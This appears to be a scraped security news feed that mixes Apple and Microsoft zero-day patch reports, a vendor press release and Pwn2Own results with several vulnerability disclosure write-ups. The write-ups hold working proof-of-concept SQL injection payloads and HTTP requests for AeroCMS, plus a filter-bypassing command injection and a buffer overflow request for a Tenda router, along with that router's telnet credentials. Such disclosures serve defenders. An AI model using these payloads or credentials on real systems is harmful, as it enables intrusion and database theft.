Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.
Tracked as CVE-2022-42856, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to

Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.

Tracked as **CVE-2022-42856**, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to arbitrary code execution.

The company said it's "aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1."

While details surrounding the exact nature of the attacks are unknown as yet, it's likely that it involved a case of social engineering or a watering hole to infect the devices when visiting a rogue or legitimate-but-compromised domain via the browser.

It's worth noting that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, is required to use the WebKit rendering engine due to restrictions imposed by Apple.

Credited with discovering and reporting the issue is Clément Lecigne of Google's Threat Analysis Group (TAG). Apple noted it addressed the bug with improved state handling.

The update, which is available with iOS 15.7.2, iPadOS 15.7.2, macOS Ventura 13.1, tvOS 16.2, and Safari 16.2, arrives two weeks after Apple patched the same bug in iOS 16.1.2 on November 30, 2022.

The fix marks the resolution of the tenth zero-day vulnerability discovered in Apple software since the start of the year. It's also the ninth actively exploited zero-day flaw in 2022 -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32917** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-42827** (Kernel) – An application may be able to execute arbitrary code with kernel privileges

The latest iOS, iPadOS, and macOS updates also introduce a new security feature called Advanced Data Protection for iCloud that expands end-to-end encryption (E2EE) to ‌iCloud‌ Backup, Notes, Photos, and more.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products

Here's what you need to patch now, including six critical updates for Microsoft's final Patch Tuesday of the year.

Microsoft has released fixes for 48 new vulnerabilities across its products, including one that attackers are actively exploiting and another that has been publicly disclosed but is not under active exploit now.

Six of the vulnerabilities that the company patched in its final monthly security update for the year are listed as critical. It assigned an important severity rating to 43 vulnerabilities and gave three flaws a moderate severity assessment. 

Microsoft's update includes patches for out-of-band CVEs it addressed over the past month, plus 23 vulnerabilities in Google's Chromium browser technology, on which Microsoft's Edge browser is based.

**Actively Exploited Security Bug**

The flaw that attackers are actively exploiting (CVE-2022-44698) is not among the more critical of the bugs for which Microsoft released patches today. The flaw gives attackers a way to bypass the Windows SmartScreen security feature for protecting users against malicious files downloaded from the Internet. 

"An attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging," Microsoft said.

CVE-2022-44698 presents only a relatively small risk for organizations, says Kevin Breen, director of cyber-threat research at Immersive Labs. "It has to be used in partnership with an executable file or other malicious code like a document or script file," Breen says. "In these situations, this CVE bypasses some of Microsoft's built-in reputation scanning and detection — namely SmartScreen, which would normally pop up to tell a user the file may not be safe." 

At the same time, users should not underestimate the threat and should patch the issue quickly, Breen recommends.

Microsoft described another flaw — an elevation of privilege issue in the DirectX Graphics kernel — as a publicly known zero-day but not under active exploit. The company assessed the vulnerability (CVE-2022-44710) as being "Important" in severity and one that would allow an attacker to gain system-level privileges if exploited. However, the company described the flaw as one that attackers are less likely to exploit.

**Vulnerabilities to Patch Now**

Trend Micro's ZDI flagged three other vulnerabilities in the December Patch Tuesday security update as being significant: CVE-2022-44713, CVE-2022-41076, and CVE-2022-44699.

CVE-2022-44713 is a spoofing vulnerability in Microsoft Outlook for Mac. The vulnerability allows an attacker to appear as a trusted user and cause a victim to mistake an email message as if it came from a legitimate user. 

"We don't often highlight spoofing bugs, but anytime you're dealing with a spoofing bug in an email client, you should take notice," ZDI's head of threat awareness Dustin Childs said in a blog post. The vulnerability could prove especially troublesome when combined with the aforementioned SmartScreen MoTW bypass flaw that attackers are actively exploiting, he said.

CVE-2022-41076 is a PowerShell remote code execution (RCE) vulnerability that allows an authenticated attacker to escape the PowerShell Remoting Session Configuration and run arbitrary commands on an affected system, Microsoft said. 

The company assessed the vulnerability as something that attackers are more likely compromise, even though attack complexity itself is high. According to Childs, organizations should pay attention the vulnerability because it is the type of flaw that attackers often exploit when looking to "live off the land" after gaining initial access on a network. 

"Definitely don’t ignore this patch," Childs wrote.

And finally, CVE-2022-44699 is another security bypass vulnerability — this time in Azure Network Watcher Agent — that, if exploited, could affect an organization's ability to capture logs needed for incident response. 

"There might not be many enterprises relying on this tool, but for those using this \[Azure Network Watcher\] VM extension, this fix should be treated as critical and deployed quickly,' Childs said.

Researchers with Cisco Talos identified three other vulnerabilities as critical and issues that organizations need to address immediately. One of them is CVE-2022-41127, an RCE vulnerability that affects Microsoft Dynamics NAV and on-premises versions of Microsoft Dynamics 365 Business Central. A successful exploit could allow an attacker to execute arbitrary code on servers running Microsoft's Dynamics NAV ERP application, Talos researchers said in a blog post. 

The other two vulnerabilities that the vendor considers to be of high importance are CVE-2022-44670 and CVE-2022-44676, both of which are RCE flaws in the Windows Secure Socket Tunneling Protocol (SSTP). 

"Successful exploitation of these vulnerabilities requires an attacker to win a race condition but could enable an attacker to remotely execute code on RAS servers," according to Microsoft's advisory.

Among the vulnerabilities that the SANS Internet Storm Center identified as important are (CVE-2022-41089), an RCE in the .NET Framework, and (CVE-2022-44690) in Microsoft SharePoint Server.

In a blog post, Mike Walters, vice president of vulnerability and threat research at Action1 Corp., also pointed to a Windows Print Spooler elevation of privilege vulnerability (CVE-2022-44678), as another issue to watch. 

"The newly resolved CVE-2022-44678 is most likely to be exploited, which is probably true because Microsoft fixed another zero-day vulnerability related to Print Spooler last month," Walters said. "The risk from CVE-2022-44678 is the same: an attacker can get SYSTEM privileges after successful exploitation — but only locally."

**A Confusing Bug Count**

Interestingly, several vendors had different takes on the number of vulnerabilities that Microsoft patched this month. ZDI, for instance, assessed that Microsoft patched 52 vulnerabilities; Talos pegged the number at 48, SANS at 74, and Action1 initially had Microsoft patching 74, before revising it down to 52.

Johannes Ullrich, dean of research for the SANS Technology Institute, says the issue has to do with the different ways one can count the vulnerabilities. Some, for instance, include Chromium vulnerabilities in their count while others do not. 

Others, like SANS, also include security advisories that sometimes accompany Microsoft updates as vulnerabilities. Microsoft also sometimes releases patches during the month, which it also includes in the following Patch Tuesday update, and some researchers don't count these. 

"The patch count can sometimes be confusing, as the Patch Tuesday cycle is technically November to December, so this will also include patches that were released out of band earlier in the month, and can also include updates from third party vendors," Breen says. "The most notable of these are patches from Google from Chromium, which is the base for Microsoft's Edge browser."  
Breen says by his count there are 74 vulnerabilities patched since the last Patch Tuesday in November. This includes 51 from Microsoft and 23 from Google for the Edge browser. 

"If we exclude both the out-of-band and Google Chromium \[patches\], 49 patches for vulnerabilities were released today," he says.

A Microsoft spokesman says the number of new CVEs for which the company issued patches today was 48.

Microsoft Squashes Zero-Day, Actively Exploited Bugs in Dec. Update

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2022-44708

Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability.

CVE-2022-41115

The approve parameter from the AeroCMS-v0.0.1 CMS system is vulnerable to SQL injection attacks.

Permalink

Cannot retrieve contributors at this time

**view\_all\_comments\_update**

The approve parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Comments -> Approve.

**Exploit**

Query out the current user

**Vulnerable Code**

    admin/includes/view_all_comments.php
    

The approve parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    UPDATE comments SET comment_status = 'approved' WHERE comment_id = 3 and extractvalue(0,concat(0x7e,user())) LIMIT 1
    

**POC**

*   Injection Point

    approve=3+and+extractvalue(0,concat(0x7e,user()))
    

*   Request

    GET /AeroCMS-0.0.1/admin/comments.php?approve=3+and+extractvalue(0,concat(0x7e,user())) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/comments.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46051: CVE/view_all_comments_update.MD at master · rdyx0/CVE

Enterprises can now adopt the industry's most comprehensive Zero Trust Network Access 2.0 to secure access to all applications from any device.

**SANTA CLARA, Calif.****,** **Dec. 13, 2022** **/PRNewswire/ —** In a world where work is now an activity not a place, organizations need to connect a distributed workforce without compromising on security and user experience. Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, today announced an expanded partnership that brings together BeyondCorp Enterprise from Google Cloud and Prisma® Access from Palo Alto Networks to provide hybrid users secure and seamless access to applications - SaaS, cloud or on-premise - from managed or unmanaged devices.

Built on the backbone of the Google Cloud network, this comprehensive cloud-delivered Zero Trust Network Access (ZTNA) 2.0 solution enables all users to work securely from anywhere regardless of device type. With Prisma Access, customers get superior ZTNA 2.0 security for all devices, branch offices and applications. BeyondCorp Enterprise Essentials enables secure access to applications and resources for unmanaged devices. Combined threat intelligence and machine learning (ML) automatically detects and remediates threats to users, applications or enterprise data; all powered by the superior performance, planetary reach, and low-latency connections of Google Cloud.

"Legacy VPN and Zero Trust Network Access (ZTNA) 1.0 solutions provide access to users that is too broad and lacks continuous security inspection, putting cloud-first and hybrid organizations at risk," said Kumar Ramchandran, SVP, Products for Palo Alto Networks. "ZTNA 2.0 by Palo Alto Networks secures the modern hybrid enterprise. This partnership will allow organizations to benefit from the performance, scale, and reliability offered by Google Cloud's global network, coupled with the security expertise of Palo Alto Networks" 

"Together with Prisma Access and BeyondCorp, customers will now have seamless access to a Zero Trust security solution built for today's workforce, powered by Google Cloud's innovation, scale, and trusted cloud infrastructure," said Sunil Potti, VP/GM, Cloud Security at Google Cloud. "At Google Cloud, we continue to deliver opinionated solutions with our customers' needs in mind, bringing together innovations from across Google and its ecosystem of partners in easy-to-consume offerings that are backed by Google's unique scale and deep experience."

Palo Alto Networks Prisma Access platform helps transform networking and security to deliver a true Zero Trust that supports both managed and unmanaged devices while delivering consistent protections across the entire enterprise. The industry's only ZTNA 2.0 solution provides deep and ongoing inspection of all application traffic, even for allowed connections to prevent all threats, including zero-day threats, providing secure access for data centers, branch offices and mobile users. Prisma Access is purpose-built on Google's global backbone to secure enterprises at cloud scale.

BeyondCorp Enterprise is based on Google's years of experience with zero trust and provides organizations with a seamless and secure experience for anyone who needs to access applications, cloud resources, and private data hosted on Google Cloud, in third-party clouds, or on-premises. BeyondCorp Enterprise leverages Chrome to provide a secure enterprise browsing solution where agents cannot be installed on devices, providing a simple, yet secure zero trust approach for unmanaged devices.

**About Palo Alto Networks**

Palo Alto Networks, the global cybersecurity leader, is shaping the cloud-centric future with technology that is transforming the way people and organizations operate. Our mission is to be the cybersecurity partner of choice, protecting our digital way of life. We help address the world's greatest security challenges with continuous innovation that seizes the latest breakthroughs in artificial intelligence, analytics, automation, and orchestration. By delivering an integrated platform and empowering a growing ecosystem of partners, we are at the forefront of protecting tens of thousands of organizations across clouds, networks, and mobile devices. Our vision is a world where each day is safer and more secure than the one before. For more information, visit www.paloaltonetworks.com.

Google Cloud and Palo Alto Networks Team to Protect the Modern Workforce

AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.

**categories\_delete\_sql\_injection**

The delete parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Categories-> Delete.

**Exploit**

The first character of the current database is ord('a'), which is chr(97), delay

**Vulnerable Code**

    AeroCMS-0.0.1\admin\categories.php
    

Use the deleteCategories() function

Traced to the 'admin/functions.php' file

The delete parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    DELETE FROM categories WHERE cat_id = 3 RLIKE (SELECT 5646 FROM (SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))=97,3,0)))))XOyv) LIMIT 1
    

**POC**

*   Injection Point

    delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv)
    

*   Request

    GET /AeroCMS-0.0.1/admin/categories.php?delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46047: CVE/categories_delete_sql_injection.md at master · rdyx0/CVE

By Habiba Rashid
The Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023.
This is a post from HackRead.com Read the original post: Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Previously **we reported** on the results from Pwn2Own Toronto for Day 1 and Day 2 and today we will be talking about the proceedings of the last two days of the contest. Without further ado, let’s get right into it.

**Pwn2Own Day 3**

On December 08, 2022, the first success of the day went to Team Viettel which earned $20,000 for their execution of an OS Command Injection attack against the WD My Cloud PRO SERIES PR4 100 in the NAS category. 

A newcomer Chi Tran of team Bun Bo Ong Chi executed their stack-based buffer overflow attack against the Canon image CLASS MF74Cdw in the Printer category and was rewarded $10,000 for their hack.

Team DEVCORE on the other hand, used one unique and one previously used bug against the Sonos One Speaker in the Smart Speaker category, earning $22,500. 

NCC Group’s representative team earned $50,000 for hacking a Ubiquiti router and a Lexmark printer in the SOHO Smashup category. The Star Labs team earned $25,000 for an attack targeting a Synology router and a Canon printer. Team Viettel was awarded $37,500 for a hack involving a Cisco router and a Canon printer.

For only the Samsung Galaxy S22 exploits throughout the event, the contestants earned a total of $125,000. Google and Apple phones were not targeted. 

By the end of the third day of the competition, a total of $934,750 had been awarded to the contestants for their successful hacks.

**Watch as Hackers Hack at Pwn2Own**

**Pwn2Own Day 4**

On December 09, 2022, on the fourth day, ZDI, the organization behind Pwn2Own, awarded another $55,000, bringing the total contest prize money to $989,750. 63 unique zero days were purchased during the four-day contest. 

The Master of Pwn title was awarded to the DEVCORE team for their winnings of $142,500 and 18.5 points. Team Viettel and NCC Group followed close behind with 16.5 and 15.5 points respectively. 

Out of the 11 attempts scheduled for the last day of the contest, targeting printers and routers, only 3 were successful since the others either failed or used bugs previously reported in the event. 

The first victory went to Chris Anastasion who used a heap-based buffer overflow to exploit the Lexmark printer, earning $10,000. This was followed by ANHTUD Information Security Department earning $10,000 by using another heap-based overflow to exploit the Canon printer. 

The last successful hack of the Pwn2Own Toronto contest was carried out by the namnp team which won $10,000 for their unique bug against the Canon printer.

**Watch as Hackers Hack at Pwn2Own**

With this, the hacking competition came to an end, marking yet another successful Pwn2Own iteration. However, the Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023. It will be an ICS/SCADA-themed event.

1.  **Google Launches Bug Bounty Prog for Open-Source Software**
2.  **Multichain hack: Hacker returns $1m, keeps $150k as bug bounty**
3.  **Xiaomi, Amazon Echo, & Samsung Smart TVs pwned at Pwn2Own**
4.  **Hack the US Army for good with ‘Hack The Army’ bug bounty prog**
5.  **Pwn2Own: Microsoft Exchange server, Teams, Zoom, Chrome pwned**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.

**Tenda W20E Command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is a Command injection vulnerability in tenda W20E V16.01.0.6(3392), which can execute arbitrary command in route system.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function do\_ping\_action:

The program passes the contents obtained by the hostName parameter to hostname.  
There is some filtering of parameters is judged by if, but we can bypass it, which is explained in the next section.  
Then, copy the content of hostname through the strncpy function into cfg.hostname.  
And cfg is called by function cmd\_get\_ping\_output().  
In function cmd\_get\_ping\_output：

Then, format the matching content of cfg.hostname through the snprintf function into new\_cmd\_buf.  
The new\_cmd\_buf is called by popen().  
There is a command injection vulnerability.  
The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack. In the judgment of If, you can see that the characters(; | &) are filtered, and if these characters are included, code will goto fail. But we can use '$' to do Command injection.  
 The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668695093889 HTTP/1.1
Host: 192.168.0.1
Content-Length: 87
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=70ebc4f9c9d22827a5874d1bb6f06abddwdvmy; bLanguage=cn; sessionid=W20Ev5:0.167.3:6b0846
Connection: close

{"setFixTools":{"networkTool":1,"hostName":"test$(touch /tmp/test0)","packageSize":32}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

Figure shows POC attack effect, the file test0 is created.

**CVE-ID**

unsigned

CVE-2022-45996: public_bug/tenda/w20e/2 at main · bugfinder0/public_bug

Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

Tag

#chrome